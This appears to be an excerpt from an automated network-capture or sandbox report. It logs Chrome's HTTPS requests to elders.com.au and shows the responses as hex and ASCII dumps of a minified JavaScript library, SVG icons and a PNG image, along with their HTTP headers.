                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 26 28 53 28 4f 62 6a 65 63 74 28 65 29 29 3f 43 2e 6d 65 72 67 65 28 6e 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 5b 65 5d 3a 65 29 3a 63 2e 63 61 6c 6c 28 6e 2c 65 29 29 2c 6e 7d 2c 69 6e 41 72 72 61 79 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 2d 31 3a 75 2e 63 61 6c 6c 28 74 2c 65 2c 6e 29 7d 2c 69 73 58 4d 4c 44 6f 63 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 6b 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 6d 65 72
                                                                                                                                    Data Ascii: &(S(Object(e))?C.merge(n,"string"==typeof e?[e]:e):c.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!k.test(t||n&&n.nodeName||"HTML")},mer
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 63 65 28 6a 2c 50 29 7d 3b 76 61 72 20 4d 3d 62 2c 4f 3d 63 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 6c 2c 63 2c 64 2c 70 2c 68 2c 6d 3d 4f 2c 76 3d 43 2e 65 78 70 61 6e 64 6f 2c 79 3d 30 2c 62 3d 30 2c 77 3d 65 65 28 29 2c 78 3d 65 65 28 29 2c 4c 3d 65 65 28 29 2c 45 3d 65 65 28 29 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 53 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f
                                                                                                                                    Data Ascii: ce(j,P)};var M=b,O=c;!function(){var e,t,n,o,a,l,c,d,p,h,m=O,v=C.expando,y=0,b=0,w=ee(),x=ee(),L=ee(),E=ee(),k=function(e,t){return e===t&&(a=!0),0},S="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|reado
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 5c 5c 66 5d 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 7a 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 4a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 56 3d 2f 5b 2b 7e 5d 2f 2c 59 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e
                                                                                                                                    Data Ascii: \\f]*\\)|)(?=[^-]|$)","i")},z=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,V=/[+~]/,Y=new RegExp("\\\\[\\da-fA-F]{1,6}[\\x20\\t\\r\\n\\f]?|\\\\([^\\r\\n\\f])","g"),G=function(e,t){var n="0x"+e.slice(1)-65536;return
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 29 75 5b 69 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 64 65 28 75 5b 69 5d 29 3b 66 3d 75 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 6d 2e 61 70 70 6c 79 28 6e 2c 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 66 29 29 2c 6e 7d 63 61 74 63 68 28 74 29 7b 45 28 65 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 76 26 26 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 79 65 28 65 2e 72 65 70 6c 61 63 65 28 4e 2c 22 24 31 22 29 2c 74 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 72 2b 22 20
                                                                                                                                    Data Ascii: )u[i]=(s?"#"+s:":scope")+" "+de(u[i]);f=u.join(",")}try{return m.apply(n,h.querySelectorAll(f)),n}catch(t){E(e,!0)}finally{s===v&&t.removeAttribute("id")}}}return ye(e.replace(N,"$1"),t,n,r)}function ee(){var e=[];return function n(r,o){return e.push(r+"
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 67 65 74 42 79 49 64 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 43 2e 65 78 70 61 6e 64 6f 2c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 43 2e 65 78 70 61 6e 64 6f 29 2e 6c 65 6e 67 74 68 7d 29 29 2c 67 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 29 2c 67 2e 73 63 6f 70 65 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 29 2c 67 2e 63 73 73 48 61 73
                                                                                                                                    Data Ascii: getById=ne((function(e){return c.appendChild(e).id=C.expando,!l.getElementsByName||!l.getElementsByName(C.expando).length})),g.disconnectedMatch=ne((function(e){return h.call(e,"*")})),g.scope=ne((function(){return l.querySelectorAll(":scope")})),g.cssHas
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 5c 5c 5b 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 53 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 76 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 76 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22
                                                                                                                                    Data Ascii: ySelectorAll("[selected]").length||p.push("\\[[\\x20\\t\\r\\n\\f]*(?:value|"+S+")"),e.querySelectorAll("[id~="+v+"-]").length||p.push("~="),e.querySelectorAll("a#"+v+"+*").length||p.push(".#.+[+~]"),e.querySelectorAll(":checked").length||p.push(":checked"
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 6e 67 74 68 3e 30 7d 2c 5a 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 2c 43 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 74 29 7d 2c 5a 2e 61 74 74 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 3b 76 61 72 20 72 3d 74 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 6f 3d 72 26 26 66 2e 63 61 6c 6c 28 74 2e 61 74 74 72 48 61 6e 64 6c 65 2c 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 72 28 65 2c 6e 2c 21 64 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 65
                                                                                                                                    Data Ascii: ngth>0},Z.contains=function(e,t){return(e.ownerDocument||e)!=l&&le(e),C.contains(e,t)},Z.attr=function(e,n){(e.ownerDocument||e)!=l&&le(e);var r=t.attrHandle[n.toLowerCase()],o=r&&f.call(t.attrHandle,n.toLowerCase())?r(e,n,!d):void 0;return void 0!==o?o:e


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    90192.168.2.449870162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC458OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-down-arrow.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:22 UTC576INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"d3-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-sjc10076-SJC
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730615153.646395,VS0,VS0,VE1
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 56917
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2adb73ac6-DFW
                                                                                                                                    2024-11-05 08:03:22 UTC217INData Raw: 64 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22 68 2d 36 20 77 2d 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 73 74 72 6f 6b 65 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 32 22 3e 0a 20 20 3c 70 61 74 68 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 20 64 3d 22 4d 31 39 20 39 6c 2d 37 20 37 2d 37 2d 37 22 20 2f 3e 0a 3c 2f 73 76 67 3e 0d 0a
                                                                                                                                    Data Ascii: d3<svg xmlns="http://www.w3.org/2000/svg" class="h-6 w-6" fill="none" viewBox="0 0 24 24" stroke="currentColor" stroke-width="2"> <path stroke-linecap="round" stroke-linejoin="round" d="M19 9l-7 7-7-7" /></svg>
                                                                                                                                    2024-11-05 08:03:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    91192.168.2.449872162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC461OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:22 UTC584INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:22 GMT
                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    Cache-Control: public, max-age=86400
                                                                                                                                    last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                    etag: W/"967-62599fcdf98c0-gzip"
                                                                                                                                    x-vhost: publish-elders
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    Age: 17537
                                                                                                                                    strict-transport-security: max-age=31557600
                                                                                                                                    x-served-by: cache-dfw-kdfw8210127-DFW
                                                                                                                                    x-cache: HIT
                                                                                                                                    x-timer: S1730248629.155532,VS0,VS0,VE4
                                                                                                                                    vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2a8dd477f-DFW
                                                                                                                                    2024-11-05 08:03:22 UTC785INData Raw: 39 36 37 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 39 20 37 2e 35 43 39 20 37 2e 33 36 37 33 39 20 39 2e 30 35 32 36 38 20 37 2e 32 34 30 32 31 20 39 2e 31 34 36 34 35 20 37 2e 31 34 36 34 35 43 39 2e 32 34 30 32 31 20 37 2e 30 35 32 36 38 20 39 2e 33 36 37 33 39 20 37 20 39 2e 35 20 37 48 31 37 2e 35 43 31 37 2e 36 33 32 36 20 37 20 31 37 2e 37 35 39 38 20 37
                                                                                                                                    Data Ascii: 967<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M9 7.5C9 7.36739 9.05268 7.24021 9.14645 7.14645C9.24021 7.05268 9.36739 7 9.5 7H17.5C17.6326 7 17.7598 7
                                                                                                                                    2024-11-05 08:03:22 UTC1369INData Raw: 31 39 20 31 36 2e 35 56 37 2e 35 43 31 39 20 37 2e 31 30 32 31 38 20 31 38 2e 38 34 32 20 36 2e 37 32 30 36 34 20 31 38 2e 35 36 30 37 20 36 2e 34 33 39 33 34 43 31 38 2e 32 37 39 34 20 36 2e 31 35 38 30 34 20 31 37 2e 38 39 37 38 20 36 20 31 37 2e 35 20 36 48 39 2e 35 43 39 2e 31 30 32 31 38 20 36 20 38 2e 37 32 30 36 34 20 36 2e 31 35 38 30 34 20 38 2e 34 33 39 33 34 20 36 2e 34 33 39 33 34 43 38 2e 31 35 38 30 34 20 36 2e 37 32 30 36 34 20 38 20 37 2e 31 30 32 31 38 20 38 20 37 2e 35 56 39 2e 35 43 38 20 39 2e 36 33 32 36 31 20 38 2e 30 35 32 36 38 20 39 2e 37 35 39 37 39 20 38 2e 31 34 36 34 35 20 39 2e 38 35 33 35 35 43 38 2e 32 34 30 32 31 20 39 2e 39 34 37 33 32 20 38 2e 33 36 37 33 39 20 31 30 20 38 2e 35 20 31 30 43 38 2e 36 33 32 36 31 20 31 30
                                                                                                                                    Data Ascii: 19 16.5V7.5C19 7.10218 18.842 6.72064 18.5607 6.43934C18.2794 6.15804 17.8978 6 17.5 6H9.5C9.10218 6 8.72064 6.15804 8.43934 6.43934C8.15804 6.72064 8 7.10218 8 7.5V9.5C8 9.63261 8.05268 9.75979 8.14645 9.85355C8.24021 9.94732 8.36739 10 8.5 10C8.63261 10
                                                                                                                                    2024-11-05 08:03:22 UTC260INData Raw: 2e 33 30 37 34 20 31 31 2e 31 34 36 20 31 35 2e 33 35 33 39 43 31 31 2e 31 39 32 35 20 31 35 2e 34 30 30 34 20 31 31 2e 32 34 37 37 20 31 35 2e 34 33 37 33 20 31 31 2e 33 30 38 34 20 31 35 2e 34 36 32 34 43 31 31 2e 33 36 39 32 20 31 35 2e 34 38 37 36 20 31 31 2e 34 33 34 33 20 31 35 2e 35 30 30 35 20 31 31 2e 35 20 31 35 2e 35 30 30 35 43 31 31 2e 35 36 35 37 20 31 35 2e 35 30 30 35 20 31 31 2e 36 33 30 38 20 31 35 2e 34 38 37 36 20 31 31 2e 36 39 31 36 20 31 35 2e 34 36 32 34 43 31 31 2e 37 35 32 33 20 31 35 2e 34 33 37 33 20 31 31 2e 38 30 37 35 20 31 35 2e 34 30 30 34 20 31 31 2e 38 35 34 20 31 35 2e 33 35 33 39 4c 31 34 2e 38 35 34 20 31 32 2e 33 35 33 39 56 31 32 2e 33 35 33 39 5a 22 20 66 69 6c 6c 3d 22 23 44 32 31 45 32 34 22 2f 3e 0a 3c 2f 73 76
                                                                                                                                    Data Ascii: .3074 11.146 15.3539C11.1925 15.4004 11.2477 15.4373 11.3084 15.4624C11.3692 15.4876 11.4343 15.5005 11.5 15.5005C11.5657 15.5005 11.6308 15.4876 11.6916 15.4624C11.7523 15.4373 11.8075 15.4004 11.854 15.3539L14.854 12.3539V12.3539Z" fill="#D21E24"/></sv
                                                                                                                                    2024-11-05 08:03:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    92192.168.2.449867162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC661OUTGET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: affinity="e47c197095b8b7ee"
                                                                                                                                    2024-11-05 08:03:23 UTC701INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:23 GMT
                                                                                                                                    Content-Type: image/png
                                                                                                                                    Content-Length: 2373
                                                                                                                                    Connection: close
                                                                                                                                    Last-Modified: Fri, 27 Jan 2023 07:07:35 GMT
                                                                                                                                    ETag: "0x8DB00352B0AF601"
                                                                                                                                    Content-Disposition: attachment; filename="teamwork-icon.png"; filename*=UTF-8''teamwork-icon.png
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Cache-Control: public, max-age=86400, immutable
                                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                    x-vhost: publish
                                                                                                                                    Strict-Transport-Security: max-age=31557600
                                                                                                                                    X-Served-By: cache-dfw-kdfw8210046-DFW
                                                                                                                                    X-Cache: MISS
                                                                                                                                    X-Timer: S1709585777.027117,VS0,VS0,VE1450
                                                                                                                                    CF-Cache-Status: REVALIDATED
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8ddb53b2bdca2e73-DFW
                                                                                                                                    2024-11-05 08:03:23 UTC668INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1f 08 06 00 00 00 f0 6c 7d 07 00 00 00 09 70 48 59 73 00 00 32 c0 00 00 32 c0 01 28 64 5a db 00 00 05 ca 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 31 33 37 2e 64 61 34 61 37 65 35 2c 20 32 30 32 32 2f 31 31 2f 32 37 2d 30 39 3a 33 35 3a 30 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                    Data Ascii: PNGIHDRl}pHYs22(dZiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:
                                                                                                                                    2024-11-05 08:03:23 UTC1369INData Raw: 54 31 37 3a 32 34 3a 35 34 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 36 35 64 63 62 65 30 2d 61 61 64 63 2d 61 33 34 65 2d 38 34 30 66 2d 38 34 63 32 31 32 36 61 65 63 34 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a
                                                                                                                                    Data Ascii: T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:
                                                                                                                                    2024-11-05 08:03:23 UTC336INData Raw: f1 2e e0 74 e4 c7 30 76 78 ba 05 4a 1a a5 4f e2 6c 6d c3 fb 70 12 47 42 62 6c 49 13 f1 7a 4f 1a 7f 13 0a 29 95 af 05 0e 61 b5 aa c0 a7 3a 07 3f 87 47 e0 c0 43 81 4f b1 d0 e4 57 48 23 b3 31 4e c1 07 61 8e c3 42 18 17 6a 81 f7 a5 42 6c 52 7e 72 55 da 5f b0 58 a2 e4 db 2e 70 c9 57 31 51 17 43 4a 73 56 5d e0 bf 23 a1 02 2f e3 9f 16 db bf 4a 3e ae d2 1a 70 bd 0b bc e3 05 51 d3 ee da ee ae 96 3c 91 33 2c 79 01 5b b5 ca cd f6 36 96 7a d2 1b 28 67 b4 89 32 8c e1 5f 96 dc 13 38 19 78 ac 6a b9 8b 91 b7 71 69 34 c3 d3 3e da e3 86 61 7f d0 93 7f 21 44 d5 81 20 d6 8c 46 df eb bd 5e 1b 14 a3 fb ad 71 7b 32 27 8d 3a b9 f2 7e 49 4a e7 ed 21 f9 6c 56 b0 05 a9 47 7f c3 4a e4 a3 6a 7d bb f5 80 30 3d b9 ea c0 2a 40 51 f0 09 8e b7 6d b0 a6 e5 92 e7 ab ea 4e 90 06 a3 c6 aa 2e
                                                                                                                                    Data Ascii: .t0vxJOlmpGBblIzO)a:?GCOWH#1NaBjBlR~rU_X.pW1QCJsV]#/J>pQ<3,y[6z(g2_8xjqi4>a!D F^q{2':~IJ!lVGJj}0=*@QmN.


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    93192.168.2.449866162.159.140.344435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:22 UTC666OUTGET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1
                                                                                                                                    Host: elders.com.au
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
